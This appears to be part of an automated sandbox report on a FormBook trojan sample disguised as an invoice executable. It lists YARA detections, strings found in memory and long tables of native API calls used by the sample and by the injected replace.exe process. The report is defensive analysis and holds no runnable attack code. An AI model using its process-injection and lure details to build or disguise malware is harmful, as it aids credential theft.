            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/talpinimo-planai/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/vps-serveriai/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.335a064.3.raw.unpack, .csLarge array initialization: : array initializer size 13798
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.3319bb4.8.raw.unpack, .csLarge array initialization: : array initializer size 13798
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.5b10000.12.raw.unpack, .csLarge array initialization: : array initializer size 13798
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: HYCO_Invoices MS2 & MS3.exe
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0042B233 NtClose,2_2_0042B233
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032B60 NtClose,LdrInitializeThunk,2_2_01032B60
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01032DF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01032C70
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010335C0 NtCreateMutant,LdrInitializeThunk,2_2_010335C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01034340 NtSetContextThread,2_2_01034340
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01034650 NtSuspendThread,2_2_01034650
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032B80 NtQueryInformationFile,2_2_01032B80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032BA0 NtEnumerateValueKey,2_2_01032BA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032BE0 NtQueryValueKey,2_2_01032BE0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032BF0 NtAllocateVirtualMemory,2_2_01032BF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032AB0 NtWaitForSingleObject,2_2_01032AB0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032AD0 NtReadFile,2_2_01032AD0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032AF0 NtWriteFile,2_2_01032AF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032D00 NtSetInformationFile,2_2_01032D00
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032D10 NtMapViewOfSection,2_2_01032D10
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032D30 NtUnmapViewOfSection,2_2_01032D30
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032DB0 NtEnumerateKey,2_2_01032DB0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032DD0 NtDelayExecution,2_2_01032DD0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032C00 NtQueryInformationProcess,2_2_01032C00
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032C60 NtCreateKey,2_2_01032C60
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032CA0 NtQueryInformationToken,2_2_01032CA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032CC0 NtQueryVirtualMemory,2_2_01032CC0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032CF0 NtOpenProcess,2_2_01032CF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032F30 NtCreateSection,2_2_01032F30
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032F60 NtCreateProcessEx,2_2_01032F60
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032F90 NtProtectVirtualMemory,2_2_01032F90
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032FA0 NtQuerySection,2_2_01032FA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032FB0 NtResumeThread,2_2_01032FB0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032FE0 NtCreateFile,2_2_01032FE0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032E30 NtWriteVirtualMemory,2_2_01032E30
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032E80 NtReadVirtualMemory,2_2_01032E80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032EA0 NtAdjustPrivilegesToken,2_2_01032EA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032EE0 NtQueueApcThread,2_2_01032EE0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01033010 NtOpenDirectoryObject,2_2_01033010
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01033090 NtSetValueKey,2_2_01033090
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010339B0 NtGetContextThread,2_2_010339B0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01033D10 NtOpenProcessToken,2_2_01033D10
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01033D70 NtOpenThread,2_2_01033D70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B4340 NtSetContextThread,LdrInitializeThunk,5_2_036B4340
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B4650 NtSuspendThread,LdrInitializeThunk,5_2_036B4650
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B35C0 NtCreateMutant,LdrInitializeThunk,5_2_036B35C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2B60 NtClose,LdrInitializeThunk,5_2_036B2B60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_036B2BE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_036B2BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_036B2BA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2AF0 NtWriteFile,LdrInitializeThunk,5_2_036B2AF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2AD0 NtReadFile,LdrInitializeThunk,5_2_036B2AD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B39B0 NtGetContextThread,LdrInitializeThunk,5_2_036B39B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2F30 NtCreateSection,LdrInitializeThunk,5_2_036B2F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2FE0 NtCreateFile,LdrInitializeThunk,5_2_036B2FE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2FB0 NtResumeThread,LdrInitializeThunk,5_2_036B2FB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_036B2EE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_036B2E80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_036B2D30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_036B2D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_036B2DF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2DD0 NtDelayExecution,LdrInitializeThunk,5_2_036B2DD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2C60 NtCreateKey,LdrInitializeThunk,5_2_036B2C60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_036B2C70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_036B2CA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B3010 NtOpenDirectoryObject,5_2_036B3010
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B3090 NtSetValueKey,5_2_036B3090
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2B80 NtQueryInformationFile,5_2_036B2B80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2AB0 NtWaitForSingleObject,5_2_036B2AB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2F60 NtCreateProcessEx,5_2_036B2F60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2FA0 NtQuerySection,5_2_036B2FA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2F90 NtProtectVirtualMemory,5_2_036B2F90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2E30 NtWriteVirtualMemory,5_2_036B2E30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2EA0 NtAdjustPrivilegesToken,5_2_036B2EA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B3D70 NtOpenThread,5_2_036B3D70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2D00 NtSetInformationFile,5_2_036B2D00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B3D10 NtOpenProcessToken,5_2_036B3D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2DB0 NtEnumerateKey,5_2_036B2DB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2C00 NtQueryInformationProcess,5_2_036B2C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2CF0 NtOpenProcess,5_2_036B2CF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B2CC0 NtQueryVirtualMemory,5_2_036B2CC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E27AC0 NtCreateFile,5_2_00E27AC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E27C20 NtReadFile,5_2_00E27C20
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E27DA0 NtClose,5_2_00E27DA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E27D10 NtDeleteFile,5_2_00E27D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E27F00 NtAllocateVirtualMemory,5_2_00E27F00
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 0_2_0190BB400_2_0190BB40
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_004011902_2_00401190
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_004032102_2_00403210
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_004023132_2_00402313
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_004023202_2_00402320
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_004025102_2_00402510
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0040FD1A2_2_0040FD1A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0040FD232_2_0040FD23
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0042D6732_2_0042D673
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_004166C32_2_004166C3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_004166BE2_2_004166BE
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0040FF432_2_0040FF43
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_004027502_2_00402750
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0040DFC32_2_0040DFC3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109A1182_2_0109A118
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010881582_2_01088158
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C01AA2_2_010C01AA
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B81CC2_2_010B81CC
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010920002_2_01092000
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF01002_2_00FF0100
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BA3522_2_010BA352
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C03E62_2_010C03E6
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100E3F02_2_0100E3F0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A02742_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010802C02_2_010802C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010005352_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C05912_2_010C0591
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B24462_2_010B2446
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010AE4F62_2_010AE4F6
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010247502_2_01024750
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010007702_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFC7C02_2_00FFC7C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101C6E02_2_0101C6E0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE68B82_2_00FE68B8
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010169622_2_01016962
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010029A02_2_010029A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010CA9A62_2_010CA9A6
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100A8402_2_0100A840
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010028402_2_01002840
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E8F02_2_0102E8F0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BAB402_2_010BAB40
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFEA802_2_00FFEA80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B6BD72_2_010B6BD7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100AD002_2_0100AD00
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF0CF22_2_00FF0CF2
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01018DBF2_2_01018DBF
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000C002_2_01000C00
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFADE02_2_00FFADE0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0CB52_2_010A0CB5
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01042F282_2_01042F28
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01020F302_2_01020F30
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01074F402_2_01074F40
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107EFA02_2_0107EFA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BEE262_2_010BEE26
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF2FC82_2_00FF2FC8
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000E592_2_01000E59
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01012E902_2_01012E90
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BCE932_2_010BCE93
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BEEDB2_2_010BEEDB
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010CB16B2_2_010CB16B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0103516C2_2_0103516C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100B1B02_2_0100B1B0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEF1722_2_00FEF172
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010070C02_2_010070C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010AF0CC2_2_010AF0CC
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B70E92_2_010B70E9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BF0E02_2_010BF0E0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B132D2_2_010B132D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0104739A2_2_0104739A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010052A02_2_010052A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FED34C2_2_00FED34C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101B2C02_2_0101B2C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A12ED2_2_010A12ED
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101D2F02_2_0101D2F0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B75712_2_010B7571
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF14602_2_00FF1460
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109D5B02_2_0109D5B0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BF43F2_2_010BF43F
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BF7B02_2_010BF7B0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B16CC2_2_010B16CC
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010959102_2_01095910
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010099502_2_01009950
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101B9502_2_0101B950
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106D8002_2_0106D800
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010038E02_2_010038E0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BFB762_2_010BFB76
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101FB802_2_0101FB80
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01075BF02_2_01075BF0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0103DBF92_2_0103DBF9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BFA492_2_010BFA49
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B7A462_2_010B7A46
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01073A6C2_2_01073A6C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01045AA02_2_01045AA0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109DAAC2_2_0109DAAC
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010ADAC62_2_010ADAC6
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01003D402_2_01003D40
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B1D5A2_2_010B1D5A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B7D732_2_010B7D73
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101FDC02_2_0101FDC0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01079C322_2_01079C32
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BFCF22_2_010BFCF2
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BFF092_2_010BFF09
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01001F922_2_01001F92
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BFFB12_2_010BFFB1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01009EB02_2_01009EB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373A3525_2_0373A352
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0366D34C5_2_0366D34C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373132D5_2_0373132D
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_037403E65_2_037403E6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0368E3F05_2_0368E3F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036C739A5_2_036C739A
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_037202745_2_03720274
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0369D2F05_2_0369D2F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_037212ED5_2_037212ED
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0369B2C05_2_0369B2C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036852A05_2_036852A0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036B516C5_2_036B516C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0366F1725_2_0366F172
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0374B16B5_2_0374B16B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_037081585_2_03708158
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036701005_2_03670100
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0371A1185_2_0371A118
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_037381CC5_2_037381CC
